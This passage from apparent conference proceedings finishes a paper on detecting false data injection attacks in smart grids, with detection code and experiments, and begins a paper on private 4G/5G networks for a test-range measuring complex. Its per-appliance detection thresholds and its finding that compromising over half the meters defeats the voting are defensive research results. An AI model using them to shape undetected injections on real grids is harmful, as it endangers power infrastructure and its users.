Like many other machine learning mechanisms, this phase is a partially supervised process. In this approach, correlation patterns are recognized between each pair of state estimates within the same correlation area, defined by the smart grid operators, instead of across the whole network. A correlation area usually contains several smart meters, while a smart meter may simultaneously belong to multiple correlation areas. Defining correlation areas ensures that all intelligent components are spatially and temporally correlated as required to solve the targeted issue. This structure also avoids the high computational complexity of analyzing data in high-dimensional spaces. It is assumed that the true changes and errors in the state estimations are normally distributed. Let si(t) denote the state estimation of a smart component i at the current time t. The sequence of previous state estimates for smart component i up to the current time, over a window T, can be represented as

Si(t, T) = (si(t − T), si(t − T + 1), ..., si(t − 1))   (3)
Each pair of smart components i and j in a correlation area G is considered. Based on the previous state estimates Si(t, T) and Sj(t, T), their Spatial Correlation Consistency Region (SCCR) can be calculated, which represents the set of all potentially correct pairs of estimates si(t) and sj(t) at the current time t. If the current pair of estimates (si(t), sj(t)) belongs to the set defined by the SCCR, the current estimates si(t) and sj(t) are consistent; otherwise, they are inconsistent. Geometrically, the SCCR can be approximated by a rotated ellipse, as shown in Fig. 3.
Fig. 3. Graphical representation of a spatial correlation consistency region
The center of the SCCR ellipse (s̄i(t), s̄j(t)) is calculated using an exponentially weighted moving average (EWMA) of the previous estimations Si(t, T) and Sj(t, T). The major and minor axes of the SCCR ellipse are calculated using principal component analysis (PCA) based on the previous estimations Si(t, T) and Sj(t, T). In this study, PCA is a mathematical procedure for converting the results of several sources into two orthogonal principal components a and b (which define the rotation angle θ) and their associated variances σa² and σb². The lengths of these axes are set to three standard deviations, 3σa and 3σb, which cover 99.46% of normal measurements.

Phase 2. Trust-based voting. After the consistency of each pair of state estimations is obtained, trust-based voting is applied to identify occurrences of anomalies. For each meter, an adjacent meter is considered trusted if the two meters are consistent. The voting is divided into two rounds. In the first round, reliable state estimates are selected based on the state estimates of their correlation neighbors. For a smart component i in a correlation area G, its correlation neighborhood Ni ⊂ G is defined as the set of all devices in G excluding i, and its consistent neighborhood Nic ⊆ Ni is defined as the set of devices such that the state estimation sj(t) of each device j in Nic is consistent with the state estimation si(t). Figure 4 shows five state estimations and their interrelationships as an example.
Fig. 4. First and second rounds of voting
According to Fig. 4:

NA = {B, C, D, E}, NE = {A, B, C, D}, NAc = {B, C, D, E}, NEc = {A}   (4)
Let |Ni| and |Nic| represent the sizes of the sets Ni and Nic, respectively. It is assumed that component i and its estimation si(t) are likely reliable (LR) at time t if |Nic|/|Ni| ≥ 50%. Otherwise, smart component i and its estimation si(t) are considered likely anomalous (LA) at time t. After the first round of voting, smart component E and its current state estimation are LA, while the others are LR. Only LR components and their state estimations can be involved in the second round of voting, such as A, B, C, D in the example presented above.
For a smart component i, NiLR ⊆ Ni is defined as the set of all LR components in the correlation area G excluding i, and NiR ⊆ NiLR is defined as the set of all LR components that are consistent with i. For instance, NELR = {A, B, C, D} and NER = {A}. The second round of voting for the state estimation si(t) has one of the following three results:

– good, if |NiR|/|NiLR| ≥ 50% and |NiLR|/|Ni| ≥ 50%;
– abnormal, if |NiR|/|NiLR| < 50% and |NiLR|/|Ni| ≥ 50%;
– unknown, otherwise.
Thus, it can be determined whether si(t) is good or abnormal if the majority of the neighbors of i are labelled LR at slot t; otherwise, the reliability of si(t) cannot be determined due to the lack of reliable references.

Phase 3. System state inference. "Good" indicates that the current state estimation si(t) is reliable, since it is highly correlated with the other state estimations in the same correlation area G. This usually means the state estimation is in a stable and probably normal state. On the contrary, "abnormal" indicates that the value of si(t) deviates from the majority of state estimations in the same correlation group; this can be due to either errors or FDI. "Unknown" occurs when there are not enough state estimations that can be regarded as reliable. This happens when there is a significant change among the state estimations in G due to real events that abruptly change the behavior of the smart grid, or due to large-scale attacks, and it should be treated as an event that requires an additional check by system administrators.
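The two voting rounds can be expressed compactly; the sketch below is our own illustration (assuming a symmetric pairwise consistency map produced by the SCCR test), not the authors' implementation, and it reproduces the Fig. 4 example:

```python
def trust_vote(components, consistent):
    """Two-round trust-based voting.

    components: iterable of component ids;
    consistent: dict mapping frozenset({i, j}) -> bool from the SCCR test.
    Returns a verdict ('good', 'abnormal' or 'unknown') per component.
    """
    # Round 1: label components likely reliable (LR) or likely anomalous (LA).
    label = {}
    for i in components:
        nb = [j for j in components if j != i]
        nb_c = [j for j in nb if consistent[frozenset((i, j))]]
        label[i] = "LR" if len(nb_c) >= 0.5 * len(nb) else "LA"
    # Round 2: only LR components serve as references.
    verdict = {}
    for i in components:
        nb = [j for j in components if j != i]
        nb_lr = [j for j in nb if label[j] == "LR"]
        if len(nb_lr) < 0.5 * len(nb):
            verdict[i] = "unknown"      # not enough reliable references
            continue
        nb_r = [j for j in nb_lr if consistent[frozenset((i, j))]]
        verdict[i] = "good" if len(nb_r) >= 0.5 * len(nb_lr) else "abnormal"
    return verdict

# Fig. 4 example: E is consistent only with A.
pairs_true = [("A", "B"), ("A", "C"), ("A", "D"), ("A", "E"),
              ("B", "C"), ("B", "D"), ("C", "D")]
pairs_false = [("B", "E"), ("C", "E"), ("D", "E")]
cons = {frozenset(p): True for p in pairs_true}
cons.update({frozenset(p): False for p in pairs_false})
print(trust_vote("ABCDE", cons))   # E -> 'abnormal', the rest -> 'good'
```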
4 Experimental Studies

4.1 Test Stand Description

To evaluate the method, we use data provided by the UMass Trace Repository, which is supported by the Laboratory for Advanced System Software (LASS); the laboratory investigates systems issues for distributed systems, ranging from large server clusters to networks of small sensors. The data were collected as part of the project "Smart*: Energy Consumption Optimization for Smart Buildings". The Smart* project aims to optimize household energy consumption, with a particular focus on modern smart homes and the new opportunities offered by such homes. The project is based on several smart homes with a large set of components that make it possible to collect real data. As part of the project, data are collected from multiple meters in six real homes; each home includes a different combination of meters. All homes are located in Western Massachusetts, with no more precise location disclosed. Traces are available for 2014–2016 in CSV format.

For our study, we use meter data from Home A, a 158-square-meter two-story building with three permanent residents. The home has a total of eight rooms, including a basement.
On the first floor there are a living room, a bedroom, a kitchen and a bathroom; the second story has two bedrooms and a bathroom. The home has no central air conditioner. The home has 35 wall switches, which mainly control lighting in rooms and closets. Two different meter models were used to take readings: the Insteon iMeter Solo and the Z-Wave Smart Energy Switch from Aeon Labs. The iMeter works well for stable loads that rarely change power consumption, such as digital clocks, lamps, etc., but is not applicable for loads with highly variable power consumption, such as TVs and computers, or for inductive loads, for instance refrigerators and vacuum cleaners.

In the paper we consider time intervals of 14 days, which is about 20,000 time stamps; the readings were taken every minute. In the readings obtained, a fairly large share is occupied by readings close to zero (less than 0.005 kW). When using the principal component method, these values should be ignored, since they correspond to the absence of equipment activity and, therefore, do not correlate with other equipment. The average energy consumption of household appliances, according to statistics, is presented in Table 1.

Table 1. Energy consumption of different household appliances.

| Energy consuming device | Power, kW | Quantity, pcs | Average daily operating time, h/day | Monthly consumption, kW·h |
|---|---|---|---|---|
| Refrigerator | 1 | 1 | 2 | 60 |
| TV set | 0.08 | 1 | 5 | 12 |
| Washer | 1.5 | 1 | 0.57 | 26 |
| Electric kettle | 2 | 1 | 0.25 | 15 |
| PC | 0.15 | 1 | 2 | 9 |
| Vacuum cleaner | 0.8 | 1 | 0.14 | 3 |
| Iron | 1 | 1 | 0.29 | 9 |
| Microwave | 1 | 1 | 0.2 | 6 |
| Lighting (incandescent lamps) | 0.6 | 10 | 0.3 | 54 |
4.2 Test Description

1. The input is a CSV file with data. These data are used for training and, by the assumption of the algorithm, are reliable (that is, they contain no false readings or alarms). The file contains minute-by-minute power readings from 7 correlated smart meters for September 2016; thus, 20,160 values for each smart meter are involved in the study.
2. The correlation area (the list of smart meters passed to the method) is determined by the smart grid operator, rather than automatically by the algorithm.
3. Before the direct application of the algorithm, the data are preprocessed: values less than 0.005 kW are rejected. These values do not correspond to the appliance data used in the study and are treated as noise in the transmission of meter readings.
4. Based on the training data Si(t, T) and Sj(t, T) taken before a given time T, the spatial correlation consistency region is computed for each pair of adjacent meters. The region is approximated by a rotated ellipse with its center at the point (s̄i(t), s̄j(t)), where s̄(t) is calculated using an exponentially weighted moving average. According to [8], this is a kind of weighted moving average whose weights decrease exponentially and never equal zero. It is determined as follows:

EWMAt = α × pt + (1 − α) × EWMAt−1   (5)
where EWMAt is the exponential moving average value at point t (the last value in the time series); EWMAt−1 is the exponential moving average value at point t − 1 (the previous value in the time series); pt is the value of the primary function at time t; α is the coefficient of the weight decrease rate, which takes values from 0 to 1: the lower its value, the greater the influence of previous values on the current value of the average. The first value of the exponential moving average is usually taken equal to the first value of the primary function:

EWMA0 = p0.   (6)
There is no mathematical formula for calculating the optimal value of the coefficient α; it is typically found by selection. The selection criterion in this case is the minimization of the mean square error of the deviation of the actual random variable from the predicted value [8]:

1. Several values of the coefficient α are selected.
2. The mean square error is calculated for each value of α.
3. The value of α for which the mean square error is minimal is taken as the best.

However, this approach is not applicable to real data, since the statistical series is constantly replenished with new meter readings. In this regard, it is impossible to fix the coefficient α once and still comply with the criterion of minimizing the mean square error. Instead, the following formula is used to calculate the coefficient α:

α = 2 / (n + 1),   (7)
where n is the smoothing interval. The advantage of this indicator over a simple moving average is its reduced latency: the oldest data has a negligible weight, so the direction is established on the basis of the latest data. The major and minor axes of the ellipse are calculated using principal component analysis. Two orthogonal principal components a and b define the rotation angle of the major axis, and the lengths of the axes are set to three standard deviations, 3σa and 3σb.
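As a concrete illustration of this step (a minimal sketch under our own assumptions, not the authors' code), the snippet below computes the EWMA centre according to (5)–(7) and derives the rotated ellipse axes with PCA, anticipating the formal algorithm described next:

```python
import numpy as np

def ewma(series, n):
    """Exponentially weighted moving average with alpha = 2 / (n + 1)."""
    alpha = 2.0 / (n + 1)                         # Eq. (7)
    value = series[0]                             # EWMA_0 = p_0, Eq. (6)
    for p in series[1:]:
        value = alpha * p + (1 - alpha) * value   # Eq. (5)
    return value

def sccr_ellipse(s_i, s_j, n=20):
    """Centre via EWMA, axes via PCA of the centred 2-D point cloud."""
    center = np.array([ewma(s_i, n), ewma(s_j, n)])
    pts = np.column_stack([s_i, s_j]) - center
    variances, axes = np.linalg.eigh(np.cov(pts.T))  # principal components
    radii = 3.0 * np.sqrt(variances)                 # 3-sigma semi-axes
    return center, axes, radii

def is_consistent(point, center, axes, radii):
    """True when a pair of current estimates falls inside the ellipse."""
    local = axes.T @ (np.asarray(point) - center)    # rotate into PC frame
    return float(np.sum((local / radii) ** 2)) <= 1.0
```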
In the general case, the process of identifying the principal components is as follows:

1. The new origin is moved to the center of the data cloud; this is the zeroth principal component (PC0).
2. The direction of maximum data variation is selected; this is the first principal component (PC1, our major axis).
3. If the data are not yet fully described, one more direction (PC2, the minor axis) is chosen perpendicular to the first, so as to describe the remaining variation in the data, and so on.

The formal algorithm is as follows. Let there be given a matrix of variables X of dimension I × J, where I is the number of samples (rows) and J is the number of independent variables (columns). The principal component method searches for new variables (principal components) ta (a = 1, ..., A), each of which is a linear combination of the original variables xj (j = 1, ..., J):

ta = pa1 x1 + ... + paJ xJ   (8)
Using these new variables, the matrix X is decomposed into the product of two matrices T and P:

X = TPᵗ + E   (9)
Here T is the score matrix of dimension I × A, P is the loading matrix of dimension J × A, and E is the residual matrix of dimension I × J. An important property of PCA is the orthogonality (independence) of the principal components. Therefore, the score matrix T does not need to be rebuilt when the number of components increases; one more column corresponding to the new direction is simply added. The same applies to the loading matrix P. According to the three-sigma rule, the resulting ellipse (Fig. 5) covers 99.46% of normal observations.

Fig. 5. Spatial correlation consistency region example

1. A new value to be checked for anomalies is passed to the method for each meter at the same moment T. An abnormal value can be injected both into one separate smart meter and into several simultaneously. For each pair of adjacent meters, we check whether the value (Si(T), Sj(T)) belongs to the ellipse, where i and j are the numbers of the corresponding meters. If the value belongs to the ellipse, the pair is consistent; otherwise, it is inconsistent. After the consistency of each pair is obtained, trust-based voting is used to detect anomalies. The voting is divided into two rounds and is detailed in phase 2 of Sect. 3.3 of this paper. The data for injection are generated based on the method described in Sect. 2.3 of this paper.
2. Datasets from the UMass Trace Repository are also used to simulate FDI attacks. The data were split into two parts: the first part, 14 days of data, is used for training and for compiling a database of matching regions for the meters under test; the second part, belonging to the time period immediately after the training, is used as the basis for modelling the attack described in [7]. To identify the threshold for detecting anomalous data, the programmed algorithm iterates over the injection values in 0.01 kW increments.
Moreover, the study determines the number of compromised meters at which anomalies are no longer detected by the method.
3. It has to be considered that the standard system behavior can naturally change during operation. This can be due both to seasonal changes (and an increase in energy consumption) and to changes in the behavior of the residents. Thus, to make the proposed method more flexible during long-term use, extra training on an updated dataset has been added to the first phase, the phase of pattern formation. During operation, the system accumulates meter statistics that have been classified as "good", without interference or injection. When a sufficient amount of data deemed reliable by the method is accumulated, the system is retrained on the new dataset, which takes into account gradual changes in operating conditions.

4.3 Detection Results

In total, 1145 attacks were carried out: 735 attacks on individual meters in the kitchen and 150 in the bathroom; 260 attacks on two or more meters were conducted simultaneously. 32 attacks were not detected. This can be explained by a very small increase of the false value compared to the spread during normal operation of the appliance. The total share of type I errors was 2.7%. Furthermore, data were transferred 96 times without injection, and 6 false positives occurred (6.2% of type II errors). The reason for this was the weak correlation between meters, which caused the consistency to be determined incorrectly. After reconfiguring the neighbor connections between meters, the number of false positives decreased significantly. If injections were made into only one meter from the set, the injection was detected when its deviation from the normal value reached the following thresholds (Table 2).
This spread of threshold values is due to each appliance's average consumption and the spread of readings permissible for it (Fig. 6).

Table 2. Detection thresholds for different electrical appliances.

| Meter | Threshold, kW |
|---|---|
| Kitchen | |
| Freezer | 0.01 |
| Electric stove | 0.55 |
| Sockets in the kitchen | 0.01 |
| Lighting in the kitchen | 0.20 |
| Dishwasher | 0.61 |
| Fridge | 0.20 |
| Microwave | 0.22 |
| Bathroom | |
| Washer | 0.03 |
| Dryer | 0.10 |
| Sockets in the bathroom | 0.02 |
| Lighting in the bathroom | 0.13 |
| Central lighting | 0.10 |
| Central sockets | 0.10 |
Fig. 6. Detection of large (a) and minor (b) injection in one meter
If injections were made into several meters at once, the proposed method successfully detected the injections, similarly to detection in a single meter (Fig. 6a, b). Accordingly, if the injection was below the average detection threshold of the meters, some of the higher-power meters perceived the injection as standard behavior and, therefore, did not detect it (Fig. 7).

Fig. 7. Detection of simultaneous injections in multiple meters

However, when more than half of the meters were injected, at the voting stage they were deprived of their trusted neighbors, so it was impossible to make a system state inference based on the current data, and the situation required additional analysis. Nonetheless, the network operator received the information that the normal operation of the network had been disrupted.
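The threshold identification described in Sect. 4.2 amounts to a simple scan; the helper below is illustrative only (the detector interface and all names are our assumptions, not the authors' code):

```python
def detection_threshold(run_detector, clean_window, meter,
                        step=0.01, max_offset=2.0):
    """Smallest injected offset (kW) flagged by the method, or None.

    run_detector(window) -> set of meters voted 'abnormal';
    clean_window: dict of meter id -> current reading in kW.
    """
    offset = step
    while offset <= max_offset:
        window = dict(clean_window)
        window[meter] += offset          # inject false data into one meter
        if meter in run_detector(window):
            return offset                # first detected deviation
        offset += step
    return None                          # not detected within the range
```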
5 Conclusions

This paper considers the problem of detecting FDI attacks in smart grids. With the active deployment of this technology and the growing number of attacks on the energy sector, this problem is highly relevant. The paper proposes a method for detecting FDI attacks based on spatio-temporal correlation that takes into account natural changes in intelligent grid operation. The method includes two stages: recognition of the spatial pattern and voting. The efficiency and effectiveness of the method were confirmed by experimental studies on data from the UMass Trace Repository, which is supported by the Laboratory for Advanced System Software (LASS). The share of type I errors was 2.7% and of type II errors 6.2%, which suggests that this method can be successfully applied to detect FDI attacks in smart grids.
References

1. Obinna, U., Joore, P., Wauben, L., Reinders, A.: Comparison of two residential Smart Grid pilots in the Netherlands and in the USA, focusing on energy performance and user experiences. Appl. Energy 191, 264–275 (2017). https://doi.org/10.1016/j.apenergy.2017.01.086
2. Smart Grid Market – Global Industry Analysis and Forecast (2017–2026). https://www.maximizemarketresearch.com/. Accessed 21 Nov 2020
3. Giordano, V., Gangale, F., Fulli, G., Sánchez Jiménez, M.: Smart grid projects in Europe: lessons learned and current developments. JRC Reference Reports (2011)
4. Mukhin, V., et al.: Decomposition method for synthesizing the computer system architecture. In: Hu, Z., Petoukhov, S., Dychka, I., He, M. (eds.) ICCSEEA 2019. AISC, vol. 938, pp. 289–300. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-16621-2_27
5. Zhang, Y., Chen, W., Gao, W.: A survey on the development status and challenges of smart grids in main driver countries. Renew. Sustain. Energy Rev. 79, 137–147 (2017). https://doi.org/10.1016/j.rser.2017.05.032
6. 2020 Data Breach Investigations Report. https://enterprise.verizon.com/resources/reports/2020-data-breach-investigations-report.pdf. Accessed 21 Jan 2021
7. Rostyslav, G., Martovytskyi, V., Sievierinov, O., Soloviova, O., Kortyak, Y.: A method for identifying and countering HID attacks: virus detection in BMP images. Int. J. Emerg. Trends Eng. Res. 8(7), 2923–2926 (2020). https://doi.org/10.30534/ijeter/2020/07872020
8. Kurt, M.N., Yılmaz, Y., Wang, X.: Real-time detection of hybrid and stealthy cyber-attacks in smart grid. IEEE Trans. Inf. Forensics Secur. 14(2), 498–513 (2018). https://doi.org/10.1109/TIFS.2018.2854745
9. Anwar, A., Mahmood, A.N., Pickering, M.: Modeling and performance evaluation of stealthy false data injection attacks on smart grid in the presence of corrupted measurements. J. Comput. Syst. Sci. 83(1), 58–72 (2017). https://doi.org/10.1016/j.jcss.2016.04.005
10. The Smart Grid: An Introduction. Prepared for the US Department of Energy by Litos Strategic Communication under Contract No. DE-AC26-04NT41817, p. 58 (2010)
11. Yao, L., Reiter, M.K., Ning, P.: False data injection attacks against state estimation in electric power grids. In: Proceedings of the 16th ACM Conference on Computer and Communications Security, CCS 2009, pp. 21–32. ACM, New York (2009). https://doi.org/10.1145/1952982.1952995
12. Shamraev, A., Shamraeva, E., Dovbnya, A., Kovalenko, A., Ilyunin, O.: Green microcontrollers in control systems for magnetic elements of linear electron accelerators. In: Kharchenko, V., Kondratenko, Y., Kacprzyk, J. (eds.) Green IT Engineering: Concepts, Models, Complex Systems Architectures. SSDC, vol. 74, pp. 283–305. Springer, Cham (2017). https://doi.org/10.1007/978-3-319-44162-7_15
13. Chen, P., Yang, S., McCann, J.A., Lin, J., Yang, X.: Detection of false data injection attacks in smart-grid systems. IEEE Commun. Mag. 53, 206–213 (2015). https://doi.org/10.1109/MCOM.2015.7045410
14. Ruban, I., Martovytskyi, V., Lukova-Chuiko, N.: Designing a monitoring model for cluster supercomputers. Eastern-Eur. J. Enterp. Technol. 6(2), 32–37 (2016). https://doi.org/10.15587/1729-4061.2016.85433
15. Yao, L., Ning, P., Reiter, M.K.: False data injection attacks against state estimation in electric power grids. ACM Trans. Inf. Syst. Secur. (TISSEC) 14, 1–33 (2011)
16. Kuchuk, G., Kovalenko, A., Komari, I.E., Svyrydov, A., Kharchenko, V.: Improving big data centers energy efficiency: traffic based model and method. In: Kharchenko, V., Kondratenko, Y., Kacprzyk, J. (eds.) Green IT Engineering: Social, Business and Industrial Applications. SSDC, vol. 171, pp. 161–183. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-00253-4_8
Implementation of Private 4G/5G Networks for Polygon Measuring Complex Provision

Igor Shostko and Yuliia Kulia(B)
Kharkiv National University of Radio Electronics, 14 Nauky Ave., Kharkiv, Ukraine {ihor.shostko,yuliia.kulia}@nure.ua
Abstract. This work is devoted to the study of world experience in the implementation of private 4G/5G networks. A private 4G/5G network is a network created within one organization. It is based on the same technology as public networks of this standard; however, it is not connected to public infrastructure, or is connected only partially. Each of its elements, from the sensors to the control center, is located within a closed circuit. In this research, the network structure is considered with regard to the peculiarities of the working process of a polygon measuring complex. The structure types of private 4G/5G networks are compared. The possibility of connecting the equipment already existing on a polygon, which uses different wireless connection standards, to a 4G/5G network is assessed as well.

Keywords: private 4G/5G network · polygon measuring complex · optoelectronic station
1 Introduction

Intense usage of digital technologies coincided with the beginning of a new age in the telecommunication field. New telecommunication technologies have appeared which ensure that specific network element configurations and the network itself operate in compliance with performance requirements, while simultaneously meeting high standards for stability of functioning and overcoming various catastrophic and dead-end situations: failures, "hanging" of the network, "broken" routes, etc. The difference between information and telecommunication systems became blurred, and a new term, "infocommunication", appeared. Infocommunication networks are currently used in all spheres of society and the state. But while the services of an infocommunication network were previously consumed mostly by people, nowadays various devices, video cameras and sensors are connected to the network.

Most of the world's well-known factories are planning to switch to fully automatic operation. The new production lines will be serviced by the Internet of Things. A large number of high-resolution cameras will be used to monitor production. Network video surveillance in automatic mode will monitor the status of various stages of production. Network video surveillance systems are beginning to play an important role in law enforcement, monitoring compliance with traffic rules on the roads, monitoring airspace near airports, detecting and monitoring ground and air targets in military conflict zones, and testing equipment at modern military test ranges.
4G technologies (and, in the near future, 5G-based ones) will play a crucial role in the transmission of video streams in all these tasks of the infocommunication network. For the implementation of specific communication tasks in various spheres of society and the state, it is recommended to use private 4G/5G networks [1–5]. The main advantages of private networks are high reliability and security while maintaining high speed and low latency. Private 4G/5G networks solve problems that cannot be solved by public infrastructure or by Wi-Fi deployed in the enterprise. Such a network is resistant to interference, well secured, and gives high signal throughput indoors. By organizing such a network, a company gets its own controlled and stable digital environment for data transmission, as well as the ability to safely use modern digital tools: voice connection, video monitoring, remote control, robotics and more.

In the framework of this article, the peculiarities of the use and structure of private 4G/5G networks for the maintenance of a polygon measuring complex (PMC) are considered. One of the tasks of the PMC is video monitoring of the flight of an aircraft, a missile, or a projectile under test. To achieve this, a network of optoelectronic stations (OES) is created, which follows the flight of the target. Each OES, in its area of responsibility, is programmed to follow the target on the projected section of the trajectory. The programming process is automated and carried out simultaneously for all OESs. The work of all OESs is synchronized. The tasks of the OES that is the first to follow the target are:

– to determine the inconsistency between the parameters of the projected and actual trajectory;
– to transfer guidance corrections to all other OESs.

Based on these data, the coordinates of the expected target capture point of each OES are adjusted. The number of OESs in the PMC is determined by the test tasks. Trajectory measurements are performed by the direction-finding method: two OESs simultaneously monitor the movement of one object and determine its coordinates as a function of time. The work of the OESs is synchronized by the unified time system. The structure of the network is built in a way that allows two routers to synchronously serve a pair of OESs, then the next pair, and so on (Fig. 1) [6]. The sequence of the survey is set according to the order in which each pair of OESs works on the target.

Fig. 1. Structural scheme of the OES network

The following information circulates in the PMC network (a hypothetical message-level sketch is given after the list):

1) From the polygon command center (PCC) to each OES: designators for guiding the OES to a given point of the flight path of the tracked target; the command prohibiting work on the chosen target; time synchronization.
2) From each OES to the PCC: the coordinates of the OES location at the polygon; confirmation of readiness to follow the target; confirmation of success in following the target.
3) Between individual OESs: corrective amendments to the trajectory of the target being followed.
4) The video stream from each OES following the target is broadcast in real time to the polygon command center. Then all video data are processed, all trajectory parameters are calculated, and the flight trajectory of the target is plotted on a topographic base.

Thus, the problems solved in the PMC are distributed both in time and space. Therefore, when designing a 4G/5G network, it is recommended to take these peculiarities into account.
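Purely as an illustration of these flows (every message name and field here is hypothetical, not taken from any PMC specification), they can be written down as typed messages:

```python
from dataclasses import dataclass

@dataclass
class Designator:                 # PCC -> OES
    oes_id: int
    x: float                      # coordinates of a projected trajectory point
    y: float
    z: float
    time_sync: float              # unified time system reference

@dataclass
class OesStatus:                  # OES -> PCC
    oes_id: int
    position: tuple               # OES location at the polygon
    ready: bool                   # readiness to follow the target
    tracking_ok: bool             # success in following the target

@dataclass
class TrajectoryCorrection:       # OES -> other OESs
    source_oes: int
    dx: float                     # guidance corrections
    dy: float
    dz: float
```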
2 The Purpose and Objectives of the Study

Object of the study: the process of building a distributed structure of private 4G/5G networks.

Subject of the study: methods of using private 4G/5G networks to provide for a polygon measuring complex.

The purpose of the study is to develop recommendations for the construction of private 4G/5G networks that ensure the operation of a polygon measuring complex. Achieving this goal requires solving the following scientific and technical problems:

1. analysis of the structure and peculiarities of use of private 4G/5G networks;
2. methods of building a distributed structure of private 4G/5G networks, taking into account the tasks of a PMC;
3. means of supporting the various wireless communication technologies of the devices connected to 4G/5G networks.
3 Usage of Private 4G/5G Networks for Providing a Polygon Measuring Complex

3.1 Features of Using a Private 4G Network, Compatibility with Other Wireless Technologies

There is a particular category of LTE networks: private networks for businesses. A private network is built almost in the same way as the usual coverage of a mobile operator; the components are the same. The difference is that such a network has a geographical limitation: it is built for only one facility, for example, a test site for aircraft, for which a separate infocommunication structure is needed. The infrastructure that manages, analyzes and monitors the network can be located centrally in one place or separately from the facility. There are three main options for managing the infocommunication structure of the polygon:

1. Self-management. If the company built the network independently, it can support it with its own staff and perform maintenance without involving a third party.
2. Outsourcing. A mobile operator builds the infrastructure, transfers it to the company for use, and is engaged in maintenance.
3. Full support. Private networks can be hired under managed-services conditions, when construction, planning and maintenance are performed by a vendor.

Since it is not enough to buy equipment and build a network, and the appropriate license to use frequencies must still be obtained, the easiest way for a company is to work with mobile operators: the operator already has a license, and the process will be much faster and easier.

The main advantages of a private network are high reliability and security while maintaining high speed and low delays. Private LTE solves problems that the public LTE infrastructure cannot handle. It is resistant to interference and well secured; LTE uses end-to-end encryption with strong cryptographic algorithms for data transmission. By organizing such a network to ensure the operation of a polygon measuring complex (PMC), a testing site receives its own controlled and stable digital environment for data transmission, and with it the ability to safely use modern digital tools during the testing process: voice communication, video monitoring, remote control, robotics.

A large number of OESs capable of filming in high resolution is used to monitor the tests at the polygon. Thus, it is possible to automatically monitor the status of various stages of testing. It is also possible to connect a video surveillance system for the territory and airspace in the area of the test site to the private LTE network to ensure the safety of the tests. LTE technology (and 5G-based technology in the near future) will play a crucial role in video streaming in all these tasks. LTE has a maximum multi-user capacity that allows multiple OESs, hundreds of camcorders, sensors or other measuring equipment to be connected simultaneously to a single access point (a base transceiver station, BTS, or eNodeB in cellular technology) without a negative impact on performance. Finally, LTE supports full mobility with handoff at speeds of up to 350 km/h, providing a stable connection with maintenance vehicles, mobile PMCs and the control center. The end-to-end delay of private LTE networks is usually in the range of 9–15 ms, and in future releases the delay will be 2–8 ms. In addition to supporting applications with high data rates and low latency, the latest LTE standards support new classes of devices with low data rates (LTE-M and NB-IoT), which makes it possible to control various electric drives (such as the slewing drives of OESs) and to connect many different sensors to the PMC.

However, there is a huge number of devices in the PMC that use other wireless technologies, for example OESs that have been connected via Wi-Fi. It is advantageous for the consumer to continue to use them instead of replacing them with new ones. Therefore, it is advisable to implement these requirements in private LTE. The first option to support various wireless technologies is based on MulteFire technology [7]. Nokia MulteFire's new user equipment and the Nokia MulteFire access point are designed for use with the Nokia DAC platform, which provides easy and quick setup of a private wireless connection. Nokia MulteFire's private wireless solution is suitable both for a permanent network connection and for temporary deployment in cases such as short-term use of terrain or a water area during testing. Another solution for the creation of private LTE networks, and in the future 5G, is the Citizens Broadband Radio Service (CBRS) implemented in the United States [8, 9]. The basic architecture for private LTE [10] is shown in Fig. 2. The network includes radio access, devices and the core network. Differences in network construction using MulteFire or CBRS technology appear at the level of subscriber access organization.

Fig. 2. LTE local area network architecture

The advantages of implementing a private LTE network to ensure the operation of the PMC at the test polygon are as follows.

1) Security and privacy. As the network is physically separated from the public infrastructure, the IT system is protected from external influences and intrusion. Each device on the network has a unique identifier that allows administrators to control the set of connections. Service information never leaves the organization's network.
2) Flexibility. In a private network, the customer determines the density of the infrastructure and the load on the network, so unforeseen failures are virtually ruled out. The customer also sets the acceptable delay settings, which is important for device synchronization. In most cases, if necessary, private LTE provides the ability to switch devices to public LTE.
3) Compatibility with infrastructure. Private networks can be connected to almost all systems in the PMC, including video surveillance, video monitoring and OES management, and internal communications. Private LTE is well compatible with various communication technologies.
4) Possibility of upgrade. LTE is used as the technological base for the development of 5G. This means that networks now operate on the LTE standard, but there is a technical possibility to convert them to 5G.

3.2 Structure, Features of Use and Advantages of Private 5G Networks for Providing a Polygon Measuring Complex

A private 5G network can be created in two ways (Fig. 3). The first is to deploy a physically isolated private 5G network (a 5G "island"), which is independent of the mobile operator's public 5G network. In this case, the private 5G network can be built by the facilities organized by the test polygon or by mobile operators; in any case, coordination with regulatory authorities is required. The second is the creation of private 5G networks by sharing the public 5G network resources of the mobile operator; in this case, a private 5G network for the PMC is built by the mobile operator.
738
I. Shostko and Y. Kulia
Fig. 3. The ways of creating a private 5G network, where:
– MEC (Mobile Edge Computing) is a multi-access edge computing controller. The MEC is deployed at the edge of the network, where it is more convenient to collect information about the wireless network in real time. In addition, information can be provided to third-party service programs through open interfaces that can optimize them, improve user interaction and ensure deep integration of the wireless network and services;
– UPF (User Plane Function) is the 5G user data transfer function, which performs all the processing of the actual data moving over the radio network;
– gNB are the base stations of the radio access network (RAN);
– 5GC-CP is the set of 5G core network control-plane elements;
– DN (Data Network) is the data cloud.

The structure of the 5GC-CP and MEC is explained in Fig. 4, which shows the standard modules and functions included in these units. In the figures below, the 5GC-CP and MEC blocks are displayed in a collapsed form.

The MEP (Multi-access Edge Platform) is an edge platform with multi-access. The MEP collects information about the lower-level network, such as the location of the UE in real time, radio channel quality, roaming status, etc., packs this information into various services such as LBS, DPI, RNIS, QoS, TCPO and others, and opens the capabilities of these services to third-party programs through a single API. For example, a third-party video application can improve the quality of the video service by adjusting the bit rate when playing video based on RNI (radio network information) and QoS information. On the other hand, the MEP transmits feedback information from top-level applications, such as the duration of maintenance, the maintenance period and subscriber mobility, to the lower-level network.

Fig. 4. The structure of 5GC-CP and MEC, where:

– RNIS (Radio Network Information Service); IoT (Internet of Things); AF (Application Function); UDM (Unified Data Management), the user data management module; NEF (Network Exposure Function), ensuring interaction with external functions; NRF (Network Repository Function), a storage of network functions; NSSF (Network Slice Selection Function); AUSF (Authentication Server Function); PCF (Policy Control Function); SMF (Session Management Function); AMF (Access and Mobility Management Function).

The UPF has four different interfaces: N3, the interface between the RAN (gNB) and the UPF; N9, the interface between two UPFs (i.e., an intermediate UPF and the session anchor UPF); N6, the interface between the data network (DN) and the UPF; N4, the interface between the session management function (SMF) and the UPF (hereinafter, the SMF is part of the 5GC-CP in all figures).

Let us consider the options for building private 5G networks [11] in relation to PMCs:

1. An isolated local 5G network built for the PMC (local 5G frequency, completely closed, non-shared).
